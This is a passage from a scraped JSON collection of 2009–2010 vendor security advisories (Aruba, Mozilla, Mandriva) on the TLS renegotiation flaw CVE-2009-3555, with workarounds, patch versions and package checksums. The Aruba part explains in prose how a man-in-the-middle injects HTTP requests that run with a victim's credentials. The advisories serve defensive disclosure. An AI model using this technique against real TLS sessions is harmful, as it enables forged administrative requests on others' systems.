RN 3.1.x, 3.3.2.x-FIPS,\r\n2.4.8.x-FIPS\r\n\r\n\r\nCHECK IF YOU ARE VULNERABLE\r\n\r\nThe only ArubaOS component that seems affected by this issue is the\r\nHTTPS WebUI administration interface. ArubaOS is vulnerable only if its\r\nconfiguration permits WebUI administration interface clients to connect\r\nusing either username/password or client certificates. If only one of\r\nthe two authentication method is allowed, this issue does not seem to apply.\r\n\r\nCheck if the following line appears in your configuration:\r\n \r\n web-server mgmt-auth username/password certificate\r\n\r\nIf the exact line does not appear in the configuration, this issue does\r\nnot apply.\r\n \r\n\r\nDETAILS\r\n\r\nAn industry wide vulnerability was discovered in TLS protocol's\r\nrenegotiation feature, which allows a client and server who already have\r\na TLS connection to negotiate new session parameters and generate new\r\nkey material. Renegotiation is carried out in the existing TLS\r\nconnection. However there is no cryptographic binding between the\r\nrenegotiated TLS session and the original TLS session. An attacker who\r\nhas established MITM between client and server may be able to take\r\nadvantage of this and inject arbitrary data into the beginning of the\r\napplication protocol stream protected by TLS. Specifically arbitrary\r\nHTTP requests can be injected in a HTTPS session where attacker (MITM)\r\nblocks HTTPS session initiation between client and server, establishes\r\nHTTPS session with the server itself, injects HTTP data and initiates\r\nTLS renegotiation with the server. Then attacker allows the\r\nrenegotiation to occur between the client and the server. After\r\nsuccessful HTTPS session establishment with the server, now the client\r\nsends its HTTP request along with its HTTP credentials (cookie) to the\r\nserver. However due to format of attacker's injected HTTP data, the\r\nclient's HTTP request is not processed, rather the attacker's HTTP\r\nrequest gets executed with credentials of the client. The attacker is\r\nnot able to view the results of the injected HTTP request due to the\r\nfact that data between the client and the server is encrypted over\r\nHTTPS.\r\n\r\nArubaOS itself does not initiate TLS renegotiation at any point.\r\n\r\nIMPACT\r\n\r\nThis vulnerability may allow a MITM attacker to inject arbitrary HTTP\r\nrequest data into the beginning of a HTTPS session between client and\r\nserver (ArubaOS WebUI). The only ArubaOS component that seems affected\r\nby this issue is the HTTPS WebUI administration interface.\r\n\r\nPre-requisites for this attack :\r\n 1. The attacker must be able to establish a MITM between the client and\r\nthe server (ArubaOS WebUI).\r\n 2. The attacker must be able to establish a successful HTTPS session\r\nwith the server (ArubaOS WebUI)\r\n 3. ArubaOS must be configured to allow certificate based HTTPS\r\nauthentication for WebUI clients (client certs).\r\n\r\nCaptive Portal users do not seem vulnerable to this issue unless somehow\r\nclient certificates are being used to authenticate captive portal users.\r\n\r\nCVSS v2 BASE METRIC SCORE: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)\r\n\r\n\r\nWORKAROUNDS\r\n\r\nAruba Networks recommends that all customers apply the appropriate\r\npatch(es) as soon as practical. However, in the event that a patch\r\ncannot immediately be applied, the following steps will help to mitigate\r\nthe risk:\r\n\r\n- - - Disable certificate based HTTPS authentication (and only allow\r\nusername-password based authentication) for WebUI clients. Client's\r\nusername-password authentication POST request will prohibit attacker's\r\ninjected HTTP data from executing with client's cookie.\r\n CLI command: web-server mgmt-auth username/password\r\n\r\n- - - Permit certificate based HTTPS authentication ONLY and disable\r\nusername-password based authentication to WebUI. This will prohibit\r\nattacker from establishing a HTTPS session with ArubaOS (for MITM)\r\nwithout a valid client cert.\r\n CLI command: web-server mgmt-auth certificate\r\n \r\n Note: This step won't stop command injection from attackers who have\r\nvalid client certificates but their assigned management role privileges\r\nare lower than that of the admin. This attack may allow them to run\r\ncommands at higher privilege than what is permitted in their role.\r\n\r\n- - - Do not expose the Mobility Controller administrative interface to\r\nuntrusted networks such as the Internet.\r\n\r\n\r\n\r\nSOLUTION\r\n\r\nAruba Networks recommends that all customers apply the appropriate\r\npatch(es) as soon as practical.\r\n\r\nThe following patches have the fix (any newer patch will also have the fix):\r\n\r\n- - - - 2.5.6.24\r\n- - - - 3.3.2.23\r\n- - - - 3.3.3.2\r\n- - - - 3.4.0.7\r\n- - - - 3.4.1.1\r\n- - - - RN 3.1.4\r\n\r\nPlease contact Aruba support for obtaining patched FIPS releases.\r\n\r\nPlease note: We highly recommend that you upgrade your Mobility\r\nController to the latest available patch on the Aruba support site\r\ncorresponding to your currently installed release.\r\n\r\n\r\nREFERENCES\r\n\r\n[1] http://extendedsubset.com/?p=8\r\n\r\n[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\r\n\r\n\r\n\r\n\r\n+----------------------------------------------------\r\n\r\nOBTAINING FIXED FIRMWARE\r\n\r\nAruba customers can obtain the firmware on the support website:\r\n http://www.arubanetworks.com/support.\r\n\r\nAruba Support contacts are as follows:\r\n\r\n 1-800-WiFiLAN (1-800-943-4526) (toll free from within North America)\r\n\r\n +1-408-754-1200 (toll call from anywhere in the world)\r\n\r\n e-mail: support(at)arubanetworks.com\r\n\r\nPlease, do not contact either "wsirt(at)arubanetworks.com" or\r\n"security(at)arubanetworks.com" for software upgrades.\r\n\r\n\r\nEXPLOITATION AND PUBLIC ANNOUNCEMENTS\r\n\r\nThis vulnerability will be announced at\r\n\r\nAruba W.S.I.R.T. Advisory:\r\nhttp://www.arubanetworks.com/support/alerts/aid-020810.txt\r\n\r\nSecurityFocus Bugtraq\r\nhttp://www.securityfocus.com/archive/1\r\n\r\n\r\nSTATUS OF THIS NOTICE: Final\r\n\r\nAlthough Aruba Networks cannot guarantee the accuracy of all statements\r\nin this advisory, all of the facts have been checked to the best of our\r\nability. Aruba Networks does not anticipate issuing updated versions of\r\nthis advisory unless there is some material change in the facts. Should\r\nthere be a significant change in the facts, Aruba Networks may update\r\nthis advisory.\r\n\r\nA stand-alone copy or paraphrase of the text of this security advisory\r\nthat omits the distribution URL in the following section is an uncontrolled\r\ncopy, and may lack important information or contain factual errors.\r\n\r\n\r\nDISTRIBUTION OF THIS ANNOUNCEMENT\r\n\r\nThis advisory will be posted on Aruba's website at:\r\nhttp://www.arubanetworks.com/support/alerts/aid-020810.txt\r\n\r\n\r\nFuture updates of this advisory, if any, will be placed on Aruba's worldwide\r\nwebsite, but may or may not be actively announced on mailing lists or\r\nnewsgroups. Users concerned about this problem are encouraged to check the\r\nabove URL for any updates.\r\n\r\n\r\nREVISION HISTORY\r\n\r\n Revision 1.0 / 02-08-2010 / Initial release\r\n\r\n\r\nARUBA WSIRT SECURITY PROCEDURES\r\n\r\nComplete information on reporting security vulnerabilities in Aruba Networks\r\nproducts, obtaining assistance with security incidents is available at\r\n http://www.arubanetworks.com/support/wsirt.php\r\n\r\n\r\nFor reporting *NEW* Aruba Networks security issues, email can be sent to\r\nwsirt(at)arubanetworks.com or security(at)arubanetworks.com. For sensitive\r\ninformation we encourage the use of PGP encryption. Our public keys can be\r\nfound at\r\n http://www.arubanetworks.com/support/wsirt.php\r\n\r\n\r\n (c) Copyright 2010 by Aruba Networks, Inc.\r\nThis advisory may be redistributed freely after the release date given at\r\nthe top of the text, provided that redistributed copies are complete and\r\nunmodified, including all date and version information.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.14 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/\r\n\r\niEYEARECAAYFAktwksYACgkQp6KijA4qefXErQCeKJW3YU3Nl7JY4+2Hp2zqM3bN\r\nbWAAoJWQT+yeWX2q+02hNEwHWQtGf1YP\r\n=CrHf\r\n-----END PGP SIGNATURE-----", "modified": "2010-02-10T00:00:00", "published": "2010-02-10T00:00:00", "id": "SECURITYVULNS:DOC:23220", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23220", "title": "Aruba Advisory ID: AID-020810 TLS Protocol Session Renegotiation Security Vulnerability", "type": "securityvulns", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:34", "bulletinFamily": "software", "description": "Mozilla Foundation Security Advisory 2010-22\r\n\r\nTitle: Update NSS to support TLS renegotiation indication\r\nImpact: Low\r\nAnnounced: March 30, 2010\r\nReporter: Mozilla developers and community\r\nProducts: Firefox, Thunderbird, SeaMonkey\r\n\r\nFixed in: Firefox 3.6.2\r\n Firefox 3.5.9\r\n Thunderbird 3.0.4\r\n SeaMonkey 2.0.4\r\nDescription\r\n\r\nMozilla developers added support in the Network Security Services module for preventing a type of man-in-the-middle attack against TLS using forced renegotiation.\r\n\r\nNote that to benefit from the fix, Firefox 3.6 and Firefox 3.5 users will need to set their security.ssl.require_safe_negotiation preference to true. Firefox 3 does not contain the fix for this issue.\r\nReferences\r\n\r\n * https://bugzilla.mozilla.org/show_bug.cgi?id=545755\r\n * CVE-2009-3555\r\n", "modified": "2010-04-06T00:00:00", "published": "2010-04-06T00:00:00", "id": "SECURITYVULNS:DOC:23561", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23561", "title": "Mozilla Foundation Security Advisory 2010-22", "type": "securityvulns", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:295\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : apache\r\n Date : November 8, 2009\r\n Affected: 2009.0, 2009.1, 2010.0, Corporate 3.0, Corporate 4.0,\r\n Enterprise Server 5.0, Multi Network Firewall 2.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A vulnerability was discovered and corrected in apache:\r\n \r\n Apache is affected by SSL injection or man-in-the-middle attacks\r\n due to a design flaw in the SSL and/or TLS protocols. A short term\r\n solution was released Sat Nov 07 2009 by the ASF team to mitigate\r\n these problems. Apache will now reject in-session renegotiation\r\n (CVE-2009-3555).\r\n \r\n Additionally the SNI patch was upgraded for 2009.0/MES5 and 2009.1.\r\n \r\n This update provides a solution to this vulnerability.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\r\n http://marc.info/?l=apache-httpd-announce&m=125755783724966&w=2\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2009.0:\r\n bb7817c8fd6d45007367f738772a6bf3 2009.0/i586/apache-base-2.2.9-12.5mdv2009.0.i586.rpm\r\n f8726194a60735e448281060ae4b36da 2009.0/i586/apache-devel-2.2.9-12.5mdv2009.0.i586.rpm\r\n fbe7be6f33026519e367e66e0b562340 2009.0/i586/apache-htcacheclean-2.2.9-12.5mdv2009.0.i586.rpm\r\n 138023055641f45f4a164e7c971a6a09 2009.0/i586/apache-mod_authn_dbd-2.2.9-12.5mdv2009.0.i586.rpm\r\n 5e688241469d2d4e99f5fd1dac76fa2f 2009.0/i586/apache-mod_cache-2.2.9-12.5mdv2009.0.i586.rpm\r\n 467f3e03bb9523d213e34310be245005 2009.0/i586/apache-mod_dav-2.2.9-12.5mdv2009.0.i586.rpm\r\n c19b8084698b3aab5e04c8e398105b64 2009.0/i586/apache-mod_dbd-2.2.9-12.5mdv2009.0.i586.rpm\r\n 6c387d03bcf96be55e5668d06468961a 2009.0/i586/apache-mod_deflate-2.2.9-12.5mdv2009.0.i586.rpm\r\n e349b4f55aa3d804295c70b9bddc923d 2009.0/i586/apache-mod_disk_cache-2.2.9-12.5mdv2009.0.i586.rpm\r\n 3a0aca578f2caf6bd6fde3b4ea2d3d3a 2009.0/i586/apache-mod_file_cache-2.2.9-12.5mdv2009.0.i586.rpm\r\n ae1cd7db54f7858dcd3cf46316fac109 2009.0/i586/apache-mod_ldap-2.2.9-12.5mdv2009.0.i586.rpm\r\n 6d253c599f47f2aa5f872939bd685880 2009.0/i586/apache-mod_mem_cache-2.2.9-12.5mdv2009.0.i586.rpm\r\n df04a63519e442a6c5b1c1a5dc166dce 2009.0/i586/apache-mod_proxy-2.2.9-12.5mdv2009.0.i586.rpm\r\n 0ee61ddcc9ba15f27105ac6e40b33feb 2009.0/i586/apache-mod_proxy_ajp-2.2.9-12.5mdv2009.0.i586.rpm\r\n 85bd2fd587538304570dda2ee99997c5 2009.0/i586/apache-mod_ssl-2.2.9-12.5mdv2009.0.i586.rpm\r\n d4eb614eb21ae8fcffcd2200808f733d 2009.0/i586/apache-modules-2.2.9-12.5mdv2009.0.i586.rpm\r\n b14ffea00afa59052bf9fa46d64502d7 2009.0/i586/apache-mod_userdir-2.2.9-12.5mdv2009.0.i586.rpm\r\n 0b50fbd6f26a4215c5a3a6741473f423 2009.0/i586/apache-mpm-event-2.2.9-12.5mdv2009.0.i586.rpm\r\n 84b03ef6c45c982d8e79ae3efa48a039 2009.0/i586/apache-mpm-itk-2.2.9-12.5mdv2009.0.i586.rpm\r\n f2d3438adfafbbd2916fd68e14ab1a5f 2009.0/i586/apache-mpm-peruser-2.2.9-12.5mdv2009.0.i586.rpm\r\n 81da89c424782750e7f48080b36d7b53 2009.0/i586/apache-mpm-prefork-2.2.9-12.5mdv2009.0.i586.rpm\r\n 3ed1f4255c574b656617d5fe8858067c 2009.0/i586/apache-mpm-worker-2.2.9-12.5mdv2009.0.i586.rpm\r\n ecbe5b3f18db2406073e54e58a79bebd 2009.0/i586/apache-source-2.2.9-12.5mdv2009.0.i586.rpm \r\n 702c4ff60f52c7e0576ea5532dddc9e3 2009.0/SRPMS/apache-2.2.9-12.5mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n 71ed1d9246a9412d4da492a3d197540d 2009.0/x86_64/apache-base-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 2dc2a515c8dc7ed51d0a360689f69bd0 2009.0/x86_64/apache-devel-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 0e9c6e43d4fed842aed0302bd9a791b1 2009.0/x86_64/apache-htcacheclean-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 694b5febe352ece3681a78fe727f7509 2009.0/x86_64/apache-mod_authn_dbd-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 7476323e5873c8069b18eb30a6e083b4 2009.0/x86_64/apache-mod_cache-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n da79b5a011f779c6d3a2f7e7a05e87ce 2009.0/x86_64/apache-mod_dav-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 8283a2cce0751f50595b959d4a00fb82 2009.0/x86_64/apache-mod_dbd-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n ab4b98932e3afd3d93a30929007ac210 2009.0/x86_64/apache-mod_deflate-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 3e696b66694d83821c393561e1bc263e 2009.0/x86_64/apache-mod_disk_cache-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n c1fd15eb1469a629af3c532ddfa4367f 2009.0/x86_64/apache-mod_file_cache-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 62e77f84a029b5b06f97d0c68598b13c 2009.0/x86_64/apache-mod_ldap-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n f4e7eaac49d05c28b9404b5a90744ade 2009.0/x86_64/apache-mod_mem_cache-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 9a111de2c5b552a8511ff4a58c6cd8b1 2009.0/x86_64/apache-mod_proxy-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 978da0f65f1112b8e8f1f506c728b861 2009.0/x86_64/apache-mod_proxy_ajp-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 898dcdbe09b70afa7c59ca19e1130084 2009.0/x86_64/apache-mod_ssl-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 3a96f2129bbde56d1412a074362bb26f 2009.0/x86_64/apache-modules-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n f80f2d91501d2dcbf4ea6c1eff3ed4ca 2009.0/x86_64/apache-mod_userdir-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 17c9bb917167139a3b69f7fd5bb5817f 2009.0/x86_64/apache-mpm-event-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n adf43b31e6fce40e28a03dc225408f90 2009.0/x86_64/apache-mpm-itk-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 0b1ac1a128b892df681ba5712a6621f1 2009.0/x86_64/apache-mpm-peruser-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 8fc055280e0c1ef8e7c5758c855b4439 2009.0/x86_64/apache-mpm-prefork-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 093d7472250b96ef722124e082cba6a5 2009.0/x86_64/apache-mpm-worker-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 9956109782f361eb6c98dbcce8f42c7a 2009.0/x86_64/apache-source-2.2.9-12.5mdv2009.0.x86_64.rpm \r\n 702c4ff60f52c7e0576ea5532dddc9e3 2009.0/SRPMS/apache-2.2.9-12.5mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.1:\r\n 94e185add24c4e10121981195c930620 2009.1/i586/apache-base-2.2.11-10.6mdv2009.1.i586.rpm\r\n 7b0c7a2be7dcdd645b7593f63aac6011 2009.1/i586/apache-devel-2.2.11-10.6mdv2009.1.i586.rpm\r\n f580d6b478eef55019c7f038d3b688ab 2009.1/i586/apache-htcacheclean-2.2.11-10.6mdv2009.1.i586.rpm\r\n b10871dc531adee1ecff565108c5c6e4 2009.1/i586/apache-mod_authn_dbd-2.2.11-10.6mdv2009.1.i586.rpm\r\n a37da4e13ce3d6e89a3c51b1659d4f92 2009.1/i586/apache-mod_cache-2.2.11-10.6mdv2009.1.i586.rpm\r\n f4a0ae7521abffef05e7e9f3930b2e5f 2009.1/i586/apache-mod_dav-2.2.11-10.6mdv2009.1.i586.rpm\r\n 6b0408eedde371ac765f77ce6c21c214 2009.1/i586/apache-mod_dbd-2.2.11-10.6mdv2009.1.i586.rpm\r\n 9dc3c4df8071b8bb169404c5569d6f93 2009.1/i586/apache-mod_deflate-2.2.11-10.6mdv2009.1.i586.rpm\r\n 7ad5f4ad2f6670be4a89c0be1783aeea 2009.1/i586/apache-mod_disk_cache-2.2.11-10.6mdv2009.1.i586.rpm\r\n e695fe99060ffca44c0be14d1cdb04ed 2009.1/i586/apache-mod_file_cache-2.2.11-10.6mdv2009.1.i586.rpm\r\n 819cea0e5f59cd42dce452acd0c0c23a 2009.1/i586/apache-mod_ldap-2.2.11-10.6mdv2009.1.i586.rpm\r\n c3ffcfa7d92d1fc79267cb0a8f5b2946 2009.1/i586/apache-mod_mem_cache-2.2.11-10.6mdv2009.1.i586.rpm\r\n a3f647d9b03d0f740473f55095932593 2009.1/i586/apache-mod_proxy-2.2.11-10.6mdv2009.1.i586.rpm\r\n f9ca6ceda431aaa1d5cf65f81bb74e29 2009.1/i586/apache-mod_proxy_ajp-2.2.11-10.6mdv2009.1.i586.rpm\r\n 8310b77c823aff2f583fa50148f470ff 2009.1/i586/apache-mod_ssl-2.2.11-10.6mdv2009.1.i586.rpm\r\n 2712526500eb75864f53d9abc4ab0e51 2009.1/i586/apache-modules-2.2.11-10.6mdv2009.1.i586.rpm\r\n 2d47c9c2713d57c09dfcc80fe54b2433 2009.1/i586/apache-mod_userdir-2.2.11-10.6mdv2009.1.i586.rpm\r\n 255e720dfd9fa2cd9a44aefd58c6ba44 2009.1/i586/apache-mpm-event-2.2.11-10.6mdv2009.1.i586.rpm\r\n 7425fcb2ea8dd837c5a2354c093e764b 2009.1/i586/apache-mpm-itk-2.2.11-10.6mdv2009.1.i586.rpm\r\n 5bfda50c5f1a6bb0ccb4d3d11c8feb1e 2009.1/i586/apache-mpm-peruser-2.2.11-10.6mdv2009.1.i586.rpm\r\n 44608bdac0bf32c864183440a5aead32 2009.1/i586/apache-mpm-prefork-2.2.11-10.6mdv2009.1.i586.rpm\r\n e8a4b35f1f1200c04a3dfc29d5613d47 2009.1/i586/apache-mpm-worker-2.2.11-10.6mdv2009.1.i586.rpm\r\n e94c33087169b55d533b90b45963c6eb 2009.1/i586/apache-source-2.2.11-10.6mdv2009.1.i586.rpm \r\n a3d3eace4fc86e7ec9c1e8184d40e8d3 2009.1/SRPMS/apache-2.2.11-10.6mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2009.1/X86_64:\r\n 06575f7b7439048b85e0f95479ab6552 2009.1/x86_64/apache-base-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 09f8979708a230d8573195f5af443ba8 2009.1/x86_64/apache-devel-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n c5ac4447e3c98a555bf458d842527a8b 2009.1/x86_64/apache-htcacheclean-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 0ea0c2a44c6490641b0db3bf9f9d7409 2009.1/x86_64/apache-mod_authn_dbd-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 8230b3bb1aa3bd6e31c9825ed4954010 2009.1/x86_64/apache-mod_cache-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 7cf8275713a8ea9aaaacd76f978dc542 2009.1/x86_64/apache-mod_dav-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n e99e0b8f90e0cfb803621d33a71fcc2a 2009.1/x86_64/apache-mod_dbd-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n ded8e4e2b4890559e15874eb662f92cb 2009.1/x86_64/apache-mod_deflate-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n cdb3af03ea373fadccd2f7a626b3f78e \r\n2009.1/x86_64/apache-mod_disk_cache-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 9c4700ffcefc5b647826a6fbff0656d3 \r\n2009.1/x86_64/apache-mod_file_cache-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 122139cc3ce8849b56441f7cc8ef1604 2009.1/x86_64/apache-mod_ldap-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 8bc5b5f06bc8f8fcf7df33eb4424a232 2009.1/x86_64/apache-mod_mem_cache-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n f43fd5d1dad41550a7e083d72ae711a8 2009.1/x86_64/apache-mod_proxy-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 11fb4de40d40787954bff02fcde4e7b9 2009.1/x86_64/apache-mod_proxy_ajp-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n b762ddfe0acd03be89a37ee168f79f45 2009.1/x86_64/apache-mod_ssl-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 10b5baf1b7a17673cc7e313c45b34eca 2009.1/x86_64/apache-modules-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 8fa6579a4728ea68c20d0d66e870802c 2009.1/x86_64/apache-mod_userdir-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 3ff5897b6496f0cf1c142a158200f9d3 2009.1/x86_64/apache-mpm-event-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 7285b05e6050739f199e3ace130adbe7 2009.1/x86_64/apache-mpm-itk-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 51299d866a14149696c0435e7ec6d3a3 2009.1/x86_64/apache-mpm-peruser-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n d17d49f4fb7bb986964dcd261c600dee 2009.1/x86_64/apache-mpm-prefork-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n ad6fc82908c310d1be2ccdf4fb4d3ce3 2009.1/x86_64/apache-mpm-worker-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 4a84ec62874c0c91d36819c81d1e0767 2009.1/x86_64/apache-source-2.2.11-10.6mdv2009.1.x86_64.rpm \r\n a3d3eace4fc86e7ec9c1e8184d40e8d3 2009.1/SRPMS/apache-2.2.11-10.6mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2010.0:\r\n d1809e51bc2dbb3a655246e85a95caf0 2010.0/i586/apache-base-2.2.14-1.1mdv2010.0.i586.rpm\r\n a78c15bf2b5e5a75eb7fc8eaa725344a 2010.0/i586/apache-devel-2.2.14-1.1mdv2010.0.i586.rpm\r\n 4f464ba836031170feb0b4e661b34419 2010.0/i586/apache-htcacheclean-2.2.14-1.1mdv2010.0.i586.rpm\r\n 0f75c700952a8384685c8d9e9f31b065 2010.0/i586/apache-mod_authn_dbd-2.2.14-1.1mdv2010.0.i586.rpm\r\n 7d98bab9cd58fae7dc2eb8e7651276de 2010.0/i586/apache-mod_cache-2.2.14-1.1mdv2010.0.i586.rpm\r\n 5e627fd34f349b2bd2a89e4c9e1f6746 2010.0/i586/apache-mod_dav-2.2.14-1.1mdv2010.0.i586.rpm\r\n fdf016ba91662793af3b5a18b004f6ac 2010.0/i586/apache-mod_dbd-2.2.14-1.1mdv2010.0.i586.rpm\r\n 1088dbea44ae4db977b77198cd564125 2010.0/i586/apache-mod_deflate-2.2.14-1.1mdv2010.0.i586.rpm\r\n c553147aa3bea5f1e455a71fffdfb6bc 2010.0/i586/apache-mod_disk_cache-2.2.14-1.1mdv2010.0.i586.rpm\r\n 350885b059fb57ed93eb6e7d4f197d3f 2010.0/i586/apache-mod_file_cache-2.2.14-1.1mdv2010.0.i586.rpm\r\n 83566cb97d796f0ddece9aa90a1ac81a 2010.0/i586/apache-mod_ldap-2.2.14-1.1mdv2010.0.i586.rpm\r\n 3dd06c6346f120722de6d78cf9372079 2010.0/i586/apache-mod_mem_cache-2.2.14-1.1mdv2010.0.i586.rpm\r\n 2e6a0c297c4b443c5327567aa1c7c243 2010.0/i586/apache-mod_proxy-2.2.14-1.1mdv2010.0.i586.rpm\r\n 40771fe728d628bfbfa2287d6f4c3155 2010.0/i586/apache-mod_proxy_ajp-2.2.14-1.1mdv2010.0.i586.rpm\r\n 259eb6f83c314c314bd9fb08f90743aa 2010.0/i586/apache-mod_proxy_scgi-2.2.14-1.1mdv2010.0.i586.rpm\r\n 4592b29ddde103e442b0a55486d6b9c2 2010.0/i586/apache-mod_ssl-2.2.14-1.1mdv2010.0.i586.rpm\r\n 829f927a019c51e53edb1a4d2e98c6b4 2010.0/i586/apache-modules-2.2.14-1.1mdv2010.0.i586.rpm\r\n a9a5e28bc8dfb9d4589260d22afb846d 2010.0/i586/apache-mod_userdir-2.2.14-1.1mdv2010.0.i586.rpm\r\n e83d855a1717bdcb5b90471136f43ab2 2010.0/i586/apache-mpm-event-2.2.14-1.1mdv2010.0.i586.rpm\r\n 535262f8fa474ae09f5587a8f690fe06 2010.0/i586/apache-mpm-itk-2.2.14-1.1mdv2010.0.i586.rpm\r\n acfb57b5b632cf0c559e583c7eba5698 2010.0/i586/apache-mpm-peruser-2.2.14-1.1mdv2010.0.i586.rpm\r\n 2b096ca235d6a5965bd9e93451f9465c 2010.0/i586/apache-mpm-prefork-2.2.14-1.1mdv2010.0.i586.rpm\r\n 4799ce79cbaccfdeb627494d10e75d70 2010.0/i586/apache-mpm-worker-2.2.14-1.1mdv2010.0.i586.rpm\r\n 73047099f8f8c6c73eb0bbf912dc242c 2010.0/i586/apache-source-2.2.14-1.1mdv2010.0.i586.rpm \r\n 0dd58d7f80879f76093cfa19db00cacd 2010.0/SRPMS/apache-2.2.14-1.1mdv2010.0.src.rpm\r\n\r\n Mandriva Linux 2010.0/X86_64:\r\n 17403e4a16b7588d58353351f39b5123 2010.0/x86_64/apache-base-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n efbd8d015a1f022995d50aef8fccf514 2010.0/x86_64/apache-devel-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 06f5ab103a5f763361a76ad85f38006d 2010.0/x86_64/apache-htcacheclean-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n cef5c18678dbbdb2a995a2743923b652 2010.0/x86_64/apache-mod_authn_dbd-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 6f94396641d7461ed7ac6dee4728a16d 2010.0/x86_64/apache-mod_cache-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n d82b85275deb95aa088f2be367720974 2010.0/x86_64/apache-mod_dav-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n ff677c2a96d9827c57de63024bf3b325 2010.0/x86_64/apache-mod_dbd-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 68c028d2759cb4bbfa92be5124c9e82a 2010.0/x86_64/apache-mod_deflate-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 8e83040fd096abe63b523aafc0cd330f 2010.0/x86_64/apache-mod_disk_cache-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n aedf657533f6ef8b87755e33992ae547 2010.0/x86_64/apache-mod_file_cache-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 70b9c3abf78961d732a64c3c0ef777d8 2010.0/x86_64/apache-mod_ldap-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 9f5355474bfa4e92b625f8a151f7ad57 2010.0/x86_64/apache-mod_mem_cache-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 9c88234150d3538ac4b12c91d81fafdd 2010.0/x86_64/apache-mod_proxy-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 7b131710288ef094929d4c7c3345e38f 2010.0/x86_64/apache-mod_proxy_ajp-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 11703b4164fac113e64dd5015be06cda 2010.0/x86_64/apache-mod_proxy_scgi-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n c11b40d2a2bae457207708ba7f60f6d5 2010.0/x86_64/apache-mod_ssl-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n b4e568b230723eb8e9f4361c9023f06d 2010.0/x86_64/apache-modules-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n e814f74a0199f669684c00cd4f73e5f5 2010.0/x86_64/apache-mod_userdir-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 68bf641f60ef5972aa965f82ccbd2d2b 